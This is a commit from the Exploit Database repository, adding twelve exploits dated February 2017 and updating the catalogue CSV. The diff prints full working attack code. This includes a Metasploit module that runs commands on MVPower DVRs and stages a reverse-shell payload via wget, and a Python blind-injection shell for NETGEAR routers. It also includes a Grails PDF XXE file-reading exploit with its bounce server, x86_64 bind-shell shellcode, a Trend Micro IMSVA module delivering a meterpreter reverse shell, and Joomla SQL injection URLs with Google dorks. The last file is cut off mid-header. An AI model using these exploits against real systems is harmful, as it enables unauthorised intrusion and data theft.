DB: 2017-02-28
12 new exploits MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit) Windows x86 - Executable Directory Search Shellcode (130 bytes) Linux/x86_64 - Random Listener Shellcode (54 bytes) NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit) Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection Joomla! Component My MSG 3.2.1 - SQL Injection Joomla! Component Spinner 360 1.3.0 - SQL Injection Joomla! Component JomSocial - SQL Injection Grails PDF Plugin 0.6 - XML External Entity Injection Joomla! Component OneVote! 1.0 - SQL Injection
This commit is contained in:
parent
3f1035a488
commit
026ded7298
13 changed files with 712 additions and 0 deletions
12
files.csv
12
files.csv
|
@ -15300,6 +15300,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
|
41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
|
||||||
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
|
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
|
||||||
41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
|
41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
|
||||||
|
41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
|
||||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||||
|
@ -15917,6 +15918,8 @@ id,file,description,date,author,platform,type,port
|
||||||
41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
|
41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
|
||||||
41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
|
41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
|
||||||
41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
|
41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
|
||||||
|
41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
|
||||||
|
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||||
|
@ -37375,3 +37378,12 @@ id,file,description,date,author,platform,type,port
|
||||||
41453,platforms/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps,0
|
41453,platforms/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps,0
|
||||||
41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0
|
41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0
|
||||||
41456,platforms/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
|
41456,platforms/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
|
||||||
|
41459,platforms/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,hardware,webapps,0
|
||||||
|
41460,platforms/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
|
||||||
|
41461,platforms/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",multiple,webapps,0
|
||||||
|
41462,platforms/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
|
||||||
|
41463,platforms/php/webapps/41463.txt,"Joomla! Component My MSG 3.2.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
|
||||||
|
41464,platforms/php/webapps/41464.txt,"Joomla! Component Spinner 360 1.3.0 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
|
||||||
|
41465,platforms/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
|
||||||
|
41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
|
||||||
|
41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
97
platforms/arm/remote/41471.rb
Executable file
97
platforms/arm/remote/41471.rb
Executable file
|
@ -0,0 +1,97 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
|
HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'MVPower DVR Shell Unauthenticated Command Execution',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits an unauthenticated remote command execution
|
||||||
|
vulnerability in MVPower digital video recorders. The 'shell' file
|
||||||
|
on the web interface executes arbitrary operating system commands in
|
||||||
|
the query string.
|
||||||
|
|
||||||
|
This module was tested successfully on a MVPower model TV-7104HE with
|
||||||
|
firmware version 1.8.4 115215B9 (Build 2014/11/17).
|
||||||
|
|
||||||
|
The TV-7108HE model is also reportedly affected, but untested.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
|
||||||
|
'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
|
||||||
|
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
# Comment from Paul Davies contains probably the first published PoC
|
||||||
|
[ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
|
||||||
|
# Writeup with PoC by Andrew Tierney from Pen Test Partners
|
||||||
|
[ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Aug 23 2015',
|
||||||
|
'Privileged' => true, # BusyBox
|
||||||
|
'Arch' => ARCH_ARMLE,
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'PAYLOAD' => 'linux/armle/mettle_reverse_tcp',
|
||||||
|
'CMDSTAGER::FLAVOR' => 'wget'
|
||||||
|
},
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
['Automatic', {}]
|
||||||
|
],
|
||||||
|
'CmdStagerFlavor' => %w{ echo printf wget },
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
begin
|
||||||
|
fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
|
||||||
|
res = send_request_cgi(
|
||||||
|
'uri' => "/shell?echo+#{fingerprint}",
|
||||||
|
'headers' => { 'Connection' => 'Keep-Alive' }
|
||||||
|
)
|
||||||
|
if res && res.body.include?(fingerprint)
|
||||||
|
return CheckCode::Vulnerable
|
||||||
|
end
|
||||||
|
rescue ::Rex::ConnectionError
|
||||||
|
return CheckCode::Unknown
|
||||||
|
end
|
||||||
|
CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
def execute_command(cmd, opts)
|
||||||
|
begin
|
||||||
|
send_request_cgi(
|
||||||
|
'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
|
||||||
|
'headers' => { 'Connection' => 'Keep-Alive' }
|
||||||
|
)
|
||||||
|
rescue ::Rex::ConnectionError
|
||||||
|
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
print_status("#{peer} - Connecting to target")
|
||||||
|
|
||||||
|
unless check == CheckCode::Vulnerable
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("#{peer} - Target is vulnerable!")
|
||||||
|
|
||||||
|
execute_cmdstager(linemax: 1500)
|
||||||
|
end
|
||||||
|
end
|
40
platforms/hardware/webapps/41459.py
Executable file
40
platforms/hardware/webapps/41459.py
Executable file
|
@ -0,0 +1,40 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
#Provides access to default user account, privileges can be easily elevated by using either:
|
||||||
|
# - a kernel exploit (ex. memodipper was tested and it worked)
|
||||||
|
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
|
||||||
|
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon)
|
||||||
|
|
||||||
|
#Pozdrawiam: Kornela, Komara i Sknerusa
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import requests
|
||||||
|
|
||||||
|
#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
|
||||||
|
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
|
||||||
|
|
||||||
|
login = 'admin'
|
||||||
|
password = 'password'
|
||||||
|
|
||||||
|
def main():
|
||||||
|
if len(sys.argv) < 2:
|
||||||
|
print "./netgearpwn_2.py <router ip>"
|
||||||
|
return
|
||||||
|
spawnShell()
|
||||||
|
|
||||||
|
def execute(cmd): #Escaping basic sanitization
|
||||||
|
requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name':"www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password))
|
||||||
|
return
|
||||||
|
|
||||||
|
def spawnShell():
|
||||||
|
print "Dropping a shell-like environment (blind OS injection)"
|
||||||
|
print "To test it type 'reboot'"
|
||||||
|
while True:
|
||||||
|
cmd = raw_input("[blind $] ")
|
||||||
|
execute(cmd)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
||||||
|
|
||||||
|
#2017-02-25 by SivertPL
|
||||||
|
#Tak, to ja.
|
140
platforms/java/webapps/41466.py
Executable file
140
platforms/java/webapps/41466.py
Executable file
|
@ -0,0 +1,140 @@
|
||||||
|
# Exploit Title: Grails PDF Plugin 0.6 XXE
|
||||||
|
# Date: 21/02/2017
|
||||||
|
# Vendor Homepage: http://www.grails.org/plugin/pdf
|
||||||
|
# Software Link: https://github.com/aeischeid/grails-pdfplugin
|
||||||
|
# Exploit Author: Charles FOL
|
||||||
|
# Contact: https://twitter.com/ambionics
|
||||||
|
# Website: https://www.ambionics.io/blog/grails-pdf-plugin-xxe
|
||||||
|
# Version: 0.6
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
|
||||||
|
1. dump_file.py
|
||||||
|
|
||||||
|
#!/usr/bin/python3
|
||||||
|
# Grails PDF Plugin XXE
|
||||||
|
# cf
|
||||||
|
# https://www.ambionics.io/blog/grails-pdf-plugin-xxe
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
import os
|
||||||
|
|
||||||
|
# Base URL of the Grails target
|
||||||
|
URL = 'http://10.0.0.179:8080/grailstest'
|
||||||
|
# "Bounce" HTTP Server
|
||||||
|
BOUNCE = 'http://10.0.0.138:7777/'
|
||||||
|
|
||||||
|
|
||||||
|
session = requests.Session()
|
||||||
|
pdfForm = '/pdf/pdfForm?url='
|
||||||
|
renderPage = 'render.html'
|
||||||
|
|
||||||
|
if len(sys.argv) < 0:
|
||||||
|
print('usage: ./%s <resource>' % sys.argv[0])
|
||||||
|
print('e.g.: ./%s file:///etc/passwd' % sys.argv[0])
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
resource = sys.argv[1]
|
||||||
|
|
||||||
|
# Build the full URL
|
||||||
|
full_url = URL + pdfForm + pdfForm + BOUNCE + renderPage
|
||||||
|
full_url += '&resource=' + sys.argv[1]
|
||||||
|
|
||||||
|
r = requests.get(full_url, allow_redirects=False)
|
||||||
|
|
||||||
|
#print(full_url)
|
||||||
|
|
||||||
|
if r.status_code != 200:
|
||||||
|
print('Error: %s' % r)
|
||||||
|
else:
|
||||||
|
with open('/tmp/file.pdf', 'wb') as handle:
|
||||||
|
handle.write(r.content)
|
||||||
|
os.system('pdftotext /tmp/file.pdf')
|
||||||
|
with open('/tmp/file.txt', 'r') as handle:
|
||||||
|
print(handle.read(), end='')
|
||||||
|
|
||||||
|
|
||||||
|
2. server.py
|
||||||
|
|
||||||
|
#!/usr/bin/python3
|
||||||
|
# Grails PDF Plugin XXE
|
||||||
|
# cf
|
||||||
|
# https://www.ambionics.io/blog/grails-pdf-plugin-xxe
|
||||||
|
#
|
||||||
|
# Server part of the exploitation
|
||||||
|
#
|
||||||
|
# Start it in an empty folder:
|
||||||
|
# $ mkdir /tmp/empty
|
||||||
|
# $ mv server.py /tmp/empty
|
||||||
|
# $ /tmp/empty/server.py
|
||||||
|
|
||||||
|
import http.server
|
||||||
|
import socketserver
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
|
BOUNCE_IP = '10.0.0.138'
|
||||||
|
BOUNCE_PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 80
|
||||||
|
|
||||||
|
# Template for the HTML page
|
||||||
|
template = """<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<!DOCTYPE html [
|
||||||
|
<!ENTITY % start "<![CDATA[">
|
||||||
|
<!ENTITY % goodies SYSTEM "[RESOURCE]">
|
||||||
|
<!ENTITY % end "]]>">
|
||||||
|
<!ENTITY % dtd SYSTEM "http://[BOUNCE]/out.dtd">
|
||||||
|
%dtd;
|
||||||
|
]>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<style>
|
||||||
|
body { font-size: 1px; width: 1000000000px;}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<pre>&all;</pre>
|
||||||
|
</body>
|
||||||
|
</html>"""
|
||||||
|
|
||||||
|
# The external DTD trick allows us to get more files; they would've been
|
||||||
|
invalid
|
||||||
|
# otherwise
|
||||||
|
# See: https://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
|
||||||
|
dtd = """<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!ENTITY all "%start;%goodies;%end;">
|
||||||
|
"""
|
||||||
|
|
||||||
|
# Really hacky. When the render.html page is requested, we extract the
|
||||||
|
# 'resource=XXX' part of the URL and create an HTML file which XXEs it.
|
||||||
|
class GetHandler(http.server.SimpleHTTPRequestHandler):
|
||||||
|
def do_GET(self):
|
||||||
|
if 'render.html' in self.path:
|
||||||
|
resource = self.path.split('resource=')[1]
|
||||||
|
print('Resource: %s' % resource)
|
||||||
|
page = template
|
||||||
|
page = page.replace('[RESOURCE]', resource)
|
||||||
|
page = page.replace('[BOUNCE]', '%s:%d' % (BOUNCE_IP,
|
||||||
|
BOUNCE_PORT))
|
||||||
|
|
||||||
|
with open('render.html', 'w') as handle:
|
||||||
|
handle.write(page)
|
||||||
|
|
||||||
|
return super().do_GET()
|
||||||
|
|
||||||
|
|
||||||
|
Handler = GetHandler
|
||||||
|
httpd = socketserver.TCPServer(("", BOUNCE_PORT), Handler)
|
||||||
|
|
||||||
|
with open('out.dtd', 'w') as handle:
|
||||||
|
handle.write(dtd)
|
||||||
|
|
||||||
|
print("Started HTTP server on port %d, press Ctrl-C to exit..." %
|
||||||
|
BOUNCE_PORT)
|
||||||
|
try:
|
||||||
|
httpd.serve_forever()
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
print("Keyboard interrupt received, exiting.")
|
||||||
|
httpd.server_close()
|
||||||
|
|
||||||
|
|
73
platforms/lin_x86-64/shellcode/41468.nasm
Executable file
73
platforms/lin_x86-64/shellcode/41468.nasm
Executable file
|
@ -0,0 +1,73 @@
|
||||||
|
;The MIT License (MIT)
|
||||||
|
|
||||||
|
;Copyright (c) 2017 Robert L. Taylor
|
||||||
|
|
||||||
|
;Permission is hereby granted, free of charge, to any person obtaining a
|
||||||
|
;copy of this software and associated documentation files (the “Software”),
|
||||||
|
;to deal in the Software without restriction, including without limitation
|
||||||
|
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
|
||||||
|
;and/or sell copies of the Software, and to permit persons to whom the
|
||||||
|
;Software is furnished to do so, subject to the following conditions:
|
||||||
|
|
||||||
|
;The above copyright notice and this permission notice shall be included
|
||||||
|
;in all copies or substantial portions of the Software.
|
||||||
|
|
||||||
|
;The Software is provided “as is”, without warranty of any kind, express or
|
||||||
|
;implied, including but not limited to the warranties of merchantability,
|
||||||
|
;fitness for a particular purpose and noninfringement. In no event shall the
|
||||||
|
;authors or copyright holders be liable for any claim, damages or other
|
||||||
|
;liability, whether in an action of contract, tort or otherwise, arising
|
||||||
|
;from, out of or in connection with the software or the use or other
|
||||||
|
;dealings in the Software.
|
||||||
|
;
|
||||||
|
; For a detailed explanation of this shellcode see my blog post:
|
||||||
|
; http://a41l4.blogspot.ca/2017/02/shellrandomlisten1434.html
|
||||||
|
|
||||||
|
global _start
|
||||||
|
|
||||||
|
section .text
|
||||||
|
|
||||||
|
_start:
|
||||||
|
; Socket
|
||||||
|
push 41
|
||||||
|
pop rax
|
||||||
|
push 2
|
||||||
|
pop rdi
|
||||||
|
push 1
|
||||||
|
pop rsi
|
||||||
|
cdq
|
||||||
|
syscall
|
||||||
|
; Listen
|
||||||
|
xor esi,esi
|
||||||
|
xchg eax,edi
|
||||||
|
mov al,50
|
||||||
|
syscall
|
||||||
|
; Accept
|
||||||
|
mov al,43
|
||||||
|
syscall
|
||||||
|
; Dup 2
|
||||||
|
push 3
|
||||||
|
pop rsi
|
||||||
|
xchg edi,eax
|
||||||
|
dup2loop:
|
||||||
|
push 33
|
||||||
|
pop rax
|
||||||
|
dec esi
|
||||||
|
syscall
|
||||||
|
jne dup2loop
|
||||||
|
; Execve
|
||||||
|
; rax and rsi and rdx are zero already
|
||||||
|
push rax ; zero terminator for the following string that we are pushing
|
||||||
|
|
||||||
|
; push /bin//sh in reverse
|
||||||
|
mov rbx, '/bin//sh'
|
||||||
|
push rbx
|
||||||
|
|
||||||
|
; store /bin//sh address in RDI
|
||||||
|
push rsp
|
||||||
|
pop rdi
|
||||||
|
|
||||||
|
; Call the Execve syscall
|
||||||
|
mov al, 59
|
||||||
|
syscall
|
||||||
|
|
144
platforms/multiple/webapps/41461.rb
Executable file
144
platforms/multiple/webapps/41461.rb
Executable file
|
@ -0,0 +1,144 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a command injection vulnerability in the Trend Micro
|
||||||
|
IMSVA product. An authenticated user can execute a terminal command under
|
||||||
|
the context of the web server user which is root. Besides, default installation
|
||||||
|
of IMSVA comes with a default administrator credentials.
|
||||||
|
saveCert.imss endpoint takes several user inputs and performs blacklisting.
|
||||||
|
After that it use them as argument of predefined operating system command
|
||||||
|
without proper sanitation. However,due to improper blacklisting rule it's possible to inject
|
||||||
|
arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
|
||||||
|
This module was tested against IMSVA 9.1-1600.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
|
||||||
|
],
|
||||||
|
'Privileged' => true,
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Space' => 1024,
|
||||||
|
'DisableNops' => true,
|
||||||
|
'BadChars' => "\x2f\x22"
|
||||||
|
},
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'SSL' => true,
|
||||||
|
'payload' => 'python/meterpreter/reverse_tcp',
|
||||||
|
},
|
||||||
|
'Platform' => ['python'],
|
||||||
|
'Arch' => ARCH_PYTHON,
|
||||||
|
'Targets' => [ ['Automatic', {}] ],
|
||||||
|
'DisclosureDate' => 'Jan 15 2017',
|
||||||
|
'DefaultTarget' => 0
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
|
||||||
|
OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]),
|
||||||
|
OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]),
|
||||||
|
Opt::RPORT(8445)
|
||||||
|
]
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
def login
|
||||||
|
|
||||||
|
user = datastore['USERNAME']
|
||||||
|
pass = datastore['PASSWORD']
|
||||||
|
|
||||||
|
print_status("Attempting to login with #{user}:#{pass}")
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'login.imss'),
|
||||||
|
'vars_post' => {
|
||||||
|
'userid' => user,
|
||||||
|
'pwdfake' => Rex::Text::encode_base64(pass)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
if res && res.body.include?("The user name or password you entered is invalid")
|
||||||
|
fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
|
||||||
|
end
|
||||||
|
|
||||||
|
cookie = res.get_cookies
|
||||||
|
if res.code == 302 && cookie.include?("JSESSIONID")
|
||||||
|
jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first
|
||||||
|
print_good("Authenticated as #{user}:#{pass}")
|
||||||
|
return jsessionid
|
||||||
|
end
|
||||||
|
|
||||||
|
nil
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
|
||||||
|
jsessionid = login
|
||||||
|
|
||||||
|
unless jsessionid
|
||||||
|
fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
|
||||||
|
end
|
||||||
|
|
||||||
|
# Somehow java stores last visited url on session like viewstate!
|
||||||
|
# Visit form before submitting it. Otherwise, it will cause a crash.
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'initCert.imss'),
|
||||||
|
'cookie' => "JSESSIONID=#{jsessionid}"
|
||||||
|
})
|
||||||
|
|
||||||
|
if !res or !res.body.include?("Transport Layer Security")
|
||||||
|
fail_with(Failure::Unknown, 'Unable to visit initCert.imss')
|
||||||
|
end
|
||||||
|
|
||||||
|
# Random string that will be used as a cert name, state, email etc.
|
||||||
|
r = Rex::Text::rand_text_alphanumeric(5)
|
||||||
|
|
||||||
|
print_status("Delivering payload...")
|
||||||
|
|
||||||
|
# Since double quote are blacklisted, we are using Single, Backslash, Single, Single on our payload. Thanks to @wvu !!!
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'saveCert.imss'),
|
||||||
|
'cookie' => "JSESSIONID=#{jsessionid}",
|
||||||
|
'vars_get' => {
|
||||||
|
'mode' => 0
|
||||||
|
},
|
||||||
|
'vars_post' => {
|
||||||
|
'certName' => r,
|
||||||
|
'certType' => 0,
|
||||||
|
'keyLength' => 2048,
|
||||||
|
'countryCode' => 'TR',
|
||||||
|
'state' => r,
|
||||||
|
'locality' => r,
|
||||||
|
'org' => r,
|
||||||
|
'orgUnit' => r,
|
||||||
|
'commonName' => "#{r}';python -c '#{payload.encoded.gsub("'", "'\\\\''")}' #",
|
||||||
|
'emailAddress' => "#{r}@mail.com",
|
||||||
|
'validDays' => '',
|
||||||
|
'id' => '',
|
||||||
|
}
|
||||||
|
})
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
17
platforms/php/webapps/41460.txt
Executable file
17
platforms/php/webapps/41460.txt
Executable file
|
@ -0,0 +1,17 @@
|
||||||
|
# # # # #
|
||||||
|
# Exploit Title: Joomla! Component Gnosis v1.1.2 - SQL Injection
|
||||||
|
# Google Dork: inurl:index.php?option=com_gnosis
|
||||||
|
# Date: 25.02.2017
|
||||||
|
# Vendor Homepage: http://hypermodern.org/
|
||||||
|
# Software : https://extensions.joomla.org/extensions/extension/directory-a-documentation/glossary/gnosis/
|
||||||
|
# Demo: http://gnosis.hypermodern.org/index.php/dictionary
|
||||||
|
# Version: 1.1.2
|
||||||
|
# Tested on: Win7 x64, Kali Linux x64
|
||||||
|
# # # # #
|
||||||
|
# Exploit Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Author Mail : ihsan[@]ihsan[.]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/index.php?option=com_gnosis&view=tags&id=[SQL]
|
||||||
|
# # # # #
|
22
platforms/php/webapps/41462.txt
Executable file
22
platforms/php/webapps/41462.txt
Executable file
|
@ -0,0 +1,22 @@
|
||||||
|
# # # # #
|
||||||
|
# Exploit Title: Joomla! Component Appointments for JomSocial v3.8.1 - SQL Injection
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 25.02.2017
|
||||||
|
# Vendor Homepage: https://www.cmsplugin.com/
|
||||||
|
# Software : https://www.cmsplugin.com/products/components/1-appointments-for-jomsocial
|
||||||
|
